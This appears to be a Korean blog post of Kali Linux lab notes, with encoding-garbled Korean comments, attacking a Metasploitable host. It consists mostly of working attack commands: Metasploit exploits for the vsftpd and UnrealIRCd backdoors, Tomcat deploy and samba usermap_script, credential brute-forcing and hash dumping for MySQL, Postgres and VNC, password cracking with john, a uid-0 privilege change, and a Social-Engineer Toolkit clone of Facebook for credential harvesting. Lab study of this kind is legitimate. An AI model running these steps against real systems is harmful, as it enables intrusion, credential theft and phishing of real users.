# password ์ค์
sudo passwd
su
# ์ฌ๋ถํ
ํ์ฉ ์ฐฝ์ด ๋์ฌ๊ฒฝ์ฐ YES ํด๋ฆญ
apt-get update && apt-get upgrade -y
# ํ๊ธ ํฐํธ ์ค์น
apt-get install -y fcitx-lib*
apt-get install -y fcitx hangul*
apt-get install -y fonts-nanum*
reboot
service postgresql start
#db ์ด๊ธฐํ
msfdb init
msfconsole
# ํด๋น ip์์ ์ฌ์ฉํ๋ ์๋น์ค ์ถ๋ ฅ
nmap 192.168.108.134
# ํด๋น ip์์ ์ฌ์ฉํ๋ ์๋น์ค ์์ธํ ์ถ๋ ฅ
nmap -sV 192.168.108.134
# msfadmin / msfadmin
ftp 192.168.108.134
cd /etc
# passwd ํ์ผ์ ๋ฐ์์ ์๋ ์ทจ์ฝ์
get passwd
quit
msfconsole
search vsftpd
=> vsftpd ์ ์ทจ์ฝ์ ํ์ธ
== ์๋์ ๊ฐ์ด๋์ด
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
==
use exploit/unix/ftp/vsftpd_234_backdoor
show options : ํ์ฌ ๊ณต๊ฒฉ ๋์ ์ํ
set RHOSTS 192.168.108.134 : ๊ณต๊ฒฉ ๋์ ์ง์
show options : RHOSTS ๋ค์ด๊ฐ๊ฒ ํ์ธ
exploit
ls -la : ๊ณต๊ฒฉ ๋๋์ง ํ์ธ
usermod -u 0 -o msfadmin : -o ์ค๋ณต ํ์ฉ ์ต์
msfadmin ์๊ฒ root๊ถํ์ ์ค๋ค.
# msfadmin uid 0 ์ธ์ง ํ์ธ
cat /etc/passwd | grep msfadmin
๊ณ์ ๋์ ์๋น์ค ํ์ธํ๊ธฐ ํ๋ค๊ธฐ ๋๋ฌธ์
nmap ๊ฒฐ๊ณผ๋ฅผ ํ
์คํธ ํ์ผ๋ก ์ ์ฅ
nmap -sV 192.168.106.130 >> /home/nmap_result.txt
ex)
-- tomcat ๋ก๊ทธ์ธ ํ์ทจ
msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.106.130
set RPORT 8180
exploit
----------------------------------------
back <-- metasploit ์์ exit ๋ฐ์ทํ ์ญํ
-- deploy ๊ธฐ๋ฅ์ ์ด์ฉํ ๊ณต๊ฒฉ ๋ชจ๋์ ์ฌ์ฉํ์ฌ ์์คํ
์์ ํ๋ํ์์ค
use exploit/multi/http/tomcat_mgr_deploy
set HttpPassword tomcat
set HttpUsername tomcat
set RHOSTS 192.168.106.130
set RPORT 8180
exploit
----------------------------------------
-- samba - usermap_script
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.106.130
exploit
-----------------------------------
-- ๊ธฐ๋ณธ ์์ ๋ฉํํ๋ฆฐํฐ ์๋ก ์
๊ทธ๋ ์ด๋
์ธ์
์ ์ฐํ Ctrl + Z ๋ฅผ ๋๋ฌ ๋๊ฐ๋ฉด ์ธ์
์ด ์ ์ง๋๋ค.
sessions : ์ธ์
ํ์ธ ๋ช
๋ น์ด
search meterpreter
use post/multi/manage/shell_to_meterpreter
set session 2
show options
run
sessions 3
-------------------------------
-- ๋น๋ฐ๋ฒํธ ํ์ทจ
use post/linux/gather/hashdump
set session 4 (๋ฉํํ๋ฆฐํฐ ์ ์ ํ)
exploit
Unshadowed Password File: /root/.msf4/loot/20200921214617_default_192.168.106.130_linux.hashes_404031.txt
=> ์ด๊ณณ์ ํจ์ค์๋ ์ ์ฅ๋จ
mv /root/.msf4/loot/20200921214617_default_192.168.106.130_linux.hashes_404031.txt /home/password.txt
john /home/password.txt
-----------------
-- ์ธ์
์ญ์
sessions -k 2
-----------------
-- mysql ๊ณต๊ฒฉ
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.0.212
exploit
mysql -h 192.168.0.212 -u root
-----------------
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS 192.168.0.212
set PASSWORD root
set USERNAME root
run
-------------------
use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS 192.168.0.212
set USERNAME root
set PASSWORD root
------------------
-- vnc
use auxiliary/scanner/vnc/vnc_login
set RHOSTS 192.168.0.212
exploit
-- ์ vnc_login์์ ์ป์ password๋ฅผ ํตํด vnc ์ ์
echo "password" | vncviewer 192.168.0.212 -autopass
------------------
-- irc
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 192.168.0.212
exploit
------------------
postgres(databases) ์๋น์ค์ ๊ณ์ ๋น๋ฐ๋ฒํธ์ ํ
์ด๋ธ ๋ชฉ๋ก์ ์กฐํํ๋ผ
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 192.168.0.212
exploit
psql -h 192.168.0.212 -U postgres
postgres / postgres
\list -- db ์กฐํ
\c postgres -- db(postgres) ์ง์
\dn ์คํค๋ง ํ์
\dt *.* -- ํ
์ด๋ธ ์กฐํ
SELECT * FROM pg_tables; ๋๊ฐ๋ฅ
\! clear : \! ๋ก bash ๋ช
๋ น์ด ์คํํ ์ ์์
---------------------------------------
use auxiliary/scanner/postgres/postgres_hashdump
set RHOSTS 192.168.0.212
run
---
3175bce1d3201d16594cebf9d7eb3f9d
---
METASPLOITABLE
FAKESITE
-- ์นผ๋ฆฌ ๋ฆฌ๋
์ค ํฐ๋ฏธ๋
-- ํ์ดํฌ ์ฌ์ดํธ ์์ฑ
setoolkit
y
-- Social-Engineering Attacks
1
-- WebSite Attack Vectors
2
-- Credential Harvester Attack Method
3
--------------------------
์๋ก์ด ํฐ๋ฏธ๋์์ apche2 ์์ ํ ์๋ ํฐ๋ฏธ๋๋ก ๋์๊ฐ
Ctrl + Shift + T
service apache2 start
--------------------------
-- Site Cloner
2
-- ์์ ์ IP
192.168.0.156
-- fake Target ์ฌ์ดํธ
http://www.facebook.com
y
์น์ฌ์ดํธ์์ ์์ ์ IP ์ฃผ์ ์ ์
๋ก๊ทธ ํ์ผ ์์น
rm ./.set/site-template
: << 'FAKESITE'
':: Linux ๐ฉ > Linux_basic' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[๋ฆฌ๋ ์ค] [AWK ๋ช ๋ น์ด] (0) | 2021.05.27 |
---|---|
[๋ฆฌ๋ ์ค] [Raid 1] (0) | 2021.05.19 |
[๋ฆฌ๋ ์ค] [Raid 0] (0) | 2021.05.19 |
[๋ฆฌ๋ ์ค] [at , cron] (0) | 2021.05.18 |
[๋ฆฌ๋ ์ค1] 5์ผ์ฐจ [grep, -E ์ต์ , ์ต์ ๋ค] (0) | 2021.04.27 |
๋๊ธ